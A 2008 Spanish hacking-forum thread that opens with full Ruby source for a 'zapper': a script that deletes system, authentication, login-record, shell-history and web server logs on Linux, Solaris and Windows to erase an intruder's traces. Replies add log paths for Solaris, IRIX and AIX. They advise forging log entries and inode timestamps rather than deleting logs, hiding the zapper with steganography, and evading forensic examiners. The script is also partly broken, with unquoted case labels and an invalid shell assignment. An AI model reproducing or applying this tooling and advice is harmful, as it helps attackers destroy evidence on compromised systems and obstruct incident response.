Zapper en ruby

Tema destacado: Deseas probar algunas mejoras a la interfaz del foro? Prueba cake! acerca de

Foro de elhacker.net

Seguridad Informática

Hacking Avanzado

Hacking Linux/Unix (Moderadores: kamsky, TRICKY, berz3k)

Zapper en ruby

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: Zapper en ruby (Leído 3,147 veces)

r0tkit3r

Desconectado

Mensajes: 16

Zapper en ruby

« en: 22 Septiembre 2008, 22:00 »

Log cleaner codeado por protos.

Código:

#Log Cleaner. Borrador de logs.
#Para servidores unix, windows o sun.
#Coded by pRotos
#protos.nu@gmail.com
if RUBY_PLATFORM =~ /linux/
os="linux"
end
if RUBY_PLATFORM =~ /win/
os="win"
end
if RUBY_PLATFORM =~ /sun/
os="sun"
end
puts "Borrando los logs..."
case os
when linux
logs= ["/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp",
"/var/log/secure","/root/.ksh_history", "/root/.bash_history",
"/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp",
"/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs",
"/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy",
"/var/log/proftpd.xferlog", "/var/log/proftpd.access_log",
"/var/log/httpd/error_log", "/var/log/httpsd/ssl_log",
"/var/log/httpsd/ssl.access_log", "/etc/mail/access",
"/var/log/qmail", "/var/log/smtpd", "/var/log/samba", "/var/lock/samba",
"/root/.Xauthority",
"/var/log/poplog", "/var/log/news.all", "/var/log/spooler",
"/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err",
"/var/log/news/news.notice",
"/var/log/news/suck.err", "/var/log/news/suck.notice",
"/var/spool/tmp", "/var/spool/errors", "/var/spool/logs",
"/var/spool/locks",
"/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log",
"/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs",
"/var/log/auth"]
logs.each {|x|
File.delete(x)
}
system('files=find / -name *.log')
system('rm $files')
puts "Logs Borrados del sistema"

when win
system('cd\ ')
system('del /S *.log')
puts "Logs Borrados del sistema"

when sun
logs= ["/var/adm/messages", "/var/adm/aculogs", "/var/adm/aculog",
"/var/adm/sulog", "/var/adm/vold.log", "/var/adm/wtmp",
"/var/adm/wtmpx", "/var/adm/utmp", "/var/adm/utmpx",
"/var/adm/log/asppp.log", "/var/log/syslog",
"/var/log/POPlog", "/var/log/authlog", "/var/adm/pacct",
"/var/lp/logs/lpsched", "/var/lp/logs/requests",
"/var/cron/logs", "/var/saf/_log", "/var/saf/port/log"]
logs.each {|x|
File.delete(x)
}
puts "Logs Borrados del sistema"
else
puts " SO no reconocido"
end


	En línea

TRICKY

The "Tricky" ..
Moderador

Desconectado

Mensajes: 1.605

Re: Zapper en ruby

« Respuesta #1 en: 23 Septiembre 2008, 01:02 »

Que tal.

A mi personalmente no me parece un buen zapper.
Acaso, que dira el Admin cuando vea que cada archivo de log ya sea bajo /var/log
o simplemente con extension .log este borrado!! Seguramente se pondra manos a
la obra para localizar al cracker. Asi, no lo veo nada adecuado si quieres mantener
r00t en la maquina ya que para borrar ciertos archivos citados en dicho zapper,
deberas tener generalmente permisos de r00t.

Saludos y Suerte.


	En línea

"La envidia es una declaración de inferioridad"
Napoleón.

berz3k

Moderador

Desconectado

Mensajes: 1.140

Re: Zapper en ruby

« Respuesta #2 en: 23 Septiembre 2008, 18:37 »

Faltaria agregar algunos PATHS para AIX, OSx86 mmm tal vez y/o armar un ejecutable para platforms win32, PERO DE NO BORRADO, el admin siempre sospecha de algo , en un analisis forense sale todo, lo mejor es modificar los inodos con fechas y algunas entrada falsas en los archivos de log, obviamente todo trabaja bajo r00t.

-berz3k.


	En línea

_Bocvk_

Desconectado

Mensajes: 15

Re: Zapper en ruby

« Respuesta #3 en: 23 Septiembre 2008, 23:34 »

Aver si les sirve esto para kien lo kiera mejorar el code

Solaris :

# /var/adm/messages
# /var/adm/aculogs
# /var/adm/aculog
# /var/adm/sulog
# /var/adm/vold.log
# /var/adm/wtmp
# /var/adm/wtmpx
# /var/adm/utmp
# /var/adm/utmpx
# /var/adm/log/asppp.log
# /var/log/syslog
# /var/log/POPlog
# /var/log/authlog
# /var/adm/pacct
# /var/lp/logs/lpsched
# /var/lp/logs/lpNet
# /var/lp/logs/requests
# /var/cron/log
# /var/saf/_log
# /var/saf/port/log
# *.log
# log*

IRIX : http://es.wikipedia.org/wiki/IRIX

##/var/adm/SYSLOG
##/var/adm/sulog
##/var/adm/utmp
##/var/adm/utmpx
##/var/adm/wtmp
##/var/adm/wtmpx
##/var/adm/lastlog/username
##/usr/spool/lp/log
##/var/adm/lp/lpd-errs
##/usr/lib/cron/log
##/var/adm/loginlog
##/var/adm/pacct
##/var/adm/dtmp
##/var/adm/acct/sum/loginlog
##/var/adm/X0msgs
##/var/adm/crash/vmcore
##/var/adm/crash/unix
## *.log
## log*

AIX (IBM) : http://es.wikipedia.org/wiki/AIX

##/var/adm/pacct
##/var/adm/wtmp
##/var/adm/dtmp
##/var/adm/qacct
##/var/adm/sulog
##/var/adm/ras/errlog
##/var/adm/ras/bootlog
##/var/adm/cron/log
##/etc/utmp
##/etc/security/lastlog
##/etc/security/failedlogin
##/usr/spool/mqueue/syslog
## *.log
## log*


	En línea

Hacking and Cracking From Scratch

TRICKY

The "Tricky" ..
Moderador

Desconectado

Mensajes: 1.605

Re: Zapper en ruby

« Respuesta #4 en: 24 Septiembre 2008, 18:32 »

Que tal.

Como opine anteriormente no lo veo conveniente ya que haec un borrado completo
de los archivos de log. Esto, llevara a la gran sospecha del Admin.

Como opinion personal aniadir que Ruby no seria mi leguaje preferido ya que
puede que el PC comprometido lo tenga, o puede que no. No me vengas diciendo
que lo vas a instalar solo para correr el zapper!
Yo, usaria Bash ( suele ser la shell mas implementada de ultimas ).

Suerte.


	En línea

"La envidia es una declaración de inferioridad"
Napoleón.

berz3k

Moderador

Desconectado

Mensajes: 1.140

Re: Zapper en ruby

« Respuesta #5 en: 29 Septiembre 2008, 17:23 »

@averno

Asi es, tendra que ser un lenguaje estandar , sin borrado y tan solo modificacion de entradas en los archivos de log, muchos OS no traen por dafault algun compilador como gcc o cc.

-berz3k.


	En línea

IWKY

Desconectado

Mensajes: 269

Re: Zapper en ruby

« Respuesta #6 en: 24 Noviembre 2008, 00:01 »

Tengo una duda, estos zappers borran las huellas que has dejado, pero quien borra las huellas del propio zapper???


	En línea

Por internet libre http://red-sostenible.net/
El mejor momento de Dragon Ball Z --> Aqui

berz3k

Moderador

Desconectado

Mensajes: 1.140

Re: Zapper en ruby

« Respuesta #7 en: 26 Noviembre 2008, 10:39 »

Un zapper lo que hara es modificar las entradas en los clasicos archivos de log, lo mas mas usuales para un analisis forense, cambiando fechas , entradas, actividad etc, para ello es necesario los privilegios en el sistema, algunos otros zappers utilizaran modificiacones en los inodos , pues es necesario para cambiar fechas etc.

Gralmente el zaper "binario" podras ocultarlo o usar tecnicas de steganografia, sera dificil encontrar tu zapper, pero no "imposible" ademas con los privilegios de root o administrador podras hacer lo que se te plazca, por e.g usar "WIPE" para borrar tus armas usadas ..

-berz3k.


	En línea

IWKY

Desconectado

Mensajes: 269

Re: Zapper en ruby

« Respuesta #8 en: 26 Noviembre 2008, 18:57 »

Gracias, era mas que nada una curiosidad, aun me queda mucho para llegar ha usar un zapper.


	En línea

Por internet libre http://red-sostenible.net/
El mejor momento de Dragon Ball Z --> Aqui

SnakingMax

Desconectado

Mensajes: 167

Re: Zapper en ruby

« Respuesta #9 en: 3 Diciembre 2008, 03:44 »

El zapper debería esperar a que tú te marches del sistema para comenzar con su trabajo o para borrar las ultimas huellas.
Y es cierto que hay cosas que evidencian el delito como por ejemplo un log en blanco xD.

Los analistas forenses guardan informacion de procesos, de logins.. que están corriendo en memoria por ejemplo haciendo en linux:
listado de archivos:

ls -Rla

listado de procesos:
ps

listado de logins:
w
who
last

Y más cosas..

Luego desenchufan el equipo "a pelo" sacandole la corriente para no perder la informacion que se borra al apagar el sistema de forma normal avisando a todos los usuarios de que el sistema se apagará y cerrando correctamente todos los procesos como ocurre por ejemplo en la mayoría de los linux con:
shutdown

Se hacen varias copias del disco duro victima y guardan su MD5 para verificar las copias y lo hacen, etiquetan las copias con una pegatina del MD5 y despues trabajan sobre algunas copias y otras se guardan como prueba. (por cierto, tambien guardan la fecha y hora de cada una de las acciones que van realizando)

Por tanto no es bueno poner el zapper para que funcione con el apagado normal del pc, el tema de los zapper es muy extenso y es complicado realizar un zapper universal.

Es mi opinion corta sobre el tema, disculpad si hay errores pero lo he ido escribiendo sobre la marcha. (en sistemas grandes los zapper no funcionan porque el log se guarda en un ordenador distinto al que hackeas pero supongo que eso ya es otra historia distinta, yo soy partidario de dejar huellas falsas)

Saludos


« Última modificación: 3 Diciembre 2008, 04:10 por SnakingMax »	En línea

Páginas: [1]

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	[Introducing Ruby] Lo que debes saber sobre Ruby Scripting	RyogiShiki	0	1,934	4 Marzo 2011, 20:45 por RyogiShiki
	nuevo metasploit en ruby Hacking Básico	Elmonky	1	877	10 Abril 2011, 17:51 por TRICKY
	Ruby On Rails PHP	El As del Club Paris	3	1,227	2 Mayo 2011, 11:39 por madpitbull_99
	[Ruby] Phishing Gen Scripting	Doddy	0	107	7 Octubre 2011, 01:31 por Doddy
	[Ruby] SQLI Scanner Scripting	Doddy	0	183	7 Octubre 2011, 01:32 por Doddy